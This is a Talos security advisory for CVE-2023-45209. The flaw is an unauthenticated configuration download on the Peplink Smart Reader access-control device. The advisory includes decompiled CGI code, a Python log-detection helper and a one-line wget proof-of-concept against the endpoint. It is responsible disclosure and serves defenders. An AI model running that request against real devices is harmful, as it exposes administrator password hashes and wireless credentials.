Talos Vulnerability Report

TALOS-2023-1865

Peplink Smart Reader web interface /cgi-bin/download_config.cgi information disclosure vulnerability

April 17, 2024

CVE Number

CVE-2023-45209

SUMMARY

An information disclosure vulnerability exists in the web interface /cgi-bin/download_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Smart Reader v1.2.0 (in QEMU)

PRODUCT URLS

Smart Reader - https://www.peplinkworks.com/Smart-Reader.asp

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-284 - Improper Access Control

DETAILS

The Peplink Smart Reader is the access-control hardware associated with the PepXIM Time-Logging and Security System. It is used to manage access to buildings, workstations and public transit, as well as for employee time management.

The Peplink Smart Reader exposes a web server on ports 80 and 443 intended for local configuration and control of the card reader. This web server exposes an unauthenticated endpoint at /cgi-bin/download_config.cgi used for downloading the active configuration file for the device. Requests destined for this endpoint will be handled by the function at offset 0x431ab0 of the /web/cgi-bin/download_config.cgi binary.

This entry point function is relatively simple and does not implement any authentication.

00431ab0  int32_t sub_431ab0()
00431ab0  {
00431acc      puts("HTTP/1.0 200 OK");
00431ad8      sub_431908("/tmp/config.bin");
00431ae8      return 0;
00431ae8  }

Further reversing of the sub_431908 function identifies that no authentication checks occur for this request. Below is an annotated decompilation of this function.

00431908  void sub_431908(char* filepath)
00431908  {
00431934      unlink("/tmp/config.txt");
00431958      char command[0x100];
00431958
00431958      // [1] Copy active config into /tmp/config.txt for enciphering
00431958      sprintf(&command, "cp -p %s %s", "/etc/masterconfig.applied", "/tmp/config.txt", 0x49c5d0);
00431970      system(&command);
00431980      unlink("/tmp/config.bin");
00431980
004318a8      // [2] Archive, compress and XOR encode the configuration file
004318a8      char encipher_command[0x100];
004318e4      sprintf(&encipher_command, "cd %s ; tar cf - %s | gzip - -c 2>/dev/null | xor > %s ; cd -) > /dev/null", "/tmp", "config.txt", "/tmp/config.bin");
00431900      system(&encipher_command);
00431900
004319a4      // [3] Determine the file size of the file to be downloaded and place it into the HTTP response headers
004319a4      struct FILE* config_fp = fopen("/tmp/config.bin", "rb");
004319b0      int32_t config_len;
004319b0      if (config_fp == 0)
004319b0      {
00431aac          config_len = 0;
00431aac      }
004319c4      else
004319c4      {
004319c4          fseek(config_fp, 0, 2);
004319ec          config_len = ftell(config_fp);
004319e8          fclose(config_fp);
004319e8      }
004319fc      puts("Content-disposition: attachment;…");
00431a10      puts("Content-Location: \"config.bin\"");
00431a28      printf("Content-Length: %d\n", config_len);
00431a3c      puts("Content-type: application/octet-…");
00431a3c
00431a50      // [4] Transmit the resulting file to the unauthenticated user
00431a50      struct FILE* enciphered_fp = fopen(filepath, "rb");
00431a5c      if (enciphered_fp != 0)
00431a5c      {
00431a64          HTTP_transmit_file(enciphered_fp);
00431a74          fclose(enciphered_fp);
00431a74      }
00431a88      fflush(*(uint32_t*)stdout);
00431a8c  }

This function effectively executes two shell commands to ([1]) copy the active configuration file into /tmp/config.txt and then ([2]) archive, compress and XOR encode the configuration file into /tmp/config.bin. Finally, at [4] the encoded archive is transmitted to the requesting user.

Notably, the contents of the active configuration file contain the administrative user’s username and an MD5 hash of their password, potentially wireless network credentials, network configuration details, SNMP configuration details, etc.

An attacker can cause the device to leak sensitive configuration information by simply making an unauthenticated HTTP request.
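As an added detection example (not part of the Talos advisory or of Peplink's code), the following Python flags hits on the unauthenticated endpoint in a web-server or reverse-proxy access log, distinguishing requests that actually returned a body from those that did not. It assumes Common Log Format and uses constructed sample lines.

```python
"""Detection helper for TALOS-2023-1865 (CVE-2023-45209).

Added example, not Talos or Peplink code. Assumes the access log in front of
the Smart Reader web interface is in Common Log Format (CLF).
"""
import re

# Endpoint named in the advisory; served without authentication on v1.2.0.
VULN_PATH = "/cgi-bin/download_config.cgi"

# CLF: host ident authuser [time] "method path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample lines (not captured from a real device).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Apr/2024:10:01:02 +0000] "GET /cgi-bin/download_config.cgi HTTP/1.1" 200 1842
198.51.100.2 - admin [17/Apr/2024:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [17/Apr/2024:10:01:05 +0000] "GET /cgi-bin/download_config.cgi?x=1 HTTP/1.1" 200 1842
malformed line that should be skipped
"""


def parse_clf(line):
    """Return the fields of one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def find_config_downloads(log_text):
    """Return one alert per request to the vulnerable CGI.

    'leaked' is True when the server answered 200 with a non-empty body,
    i.e. the enciphered config.bin was actually transmitted.
    """
    alerts = []
    for line in log_text.splitlines():
        entry = parse_clf(line)
        if entry is None:
            continue  # not CLF; skip rather than crash on odd lines
        if entry["path"].split("?", 1)[0] != VULN_PATH:
            continue
        size = 0 if entry["size"] == "-" else int(entry["size"])
        alerts.append({
            "source": entry["host"],
            "time": entry["time"],
            "status": int(entry["status"]),
            "leaked": entry["status"] == "200" and size > 0,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_config_downloads(SAMPLE_LOG):
        print(alert)
```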

Exploit Proof of Concept

wget https://$TARGET/cgi-bin/download_config.cgi --no-check-certificate

VENDOR RESPONSE

The vendor links to new firmware versions at the end of their advisory: https://forum.peplink.com/t/peplink-security-advisory-smart-reader-firmware-1-2-0-cve-2023-43491-cve-2023-45209-cve-2023-39367-cve-2023-45744-cve-2023-40146/47256

TIMELINE

2023-11-30 - Vendor Disclosure
2024-04-17 - Vendor Patch Release
2024-04-17 - Public Release

Credit

Discovered by Matt Wiseman of Cisco Talos.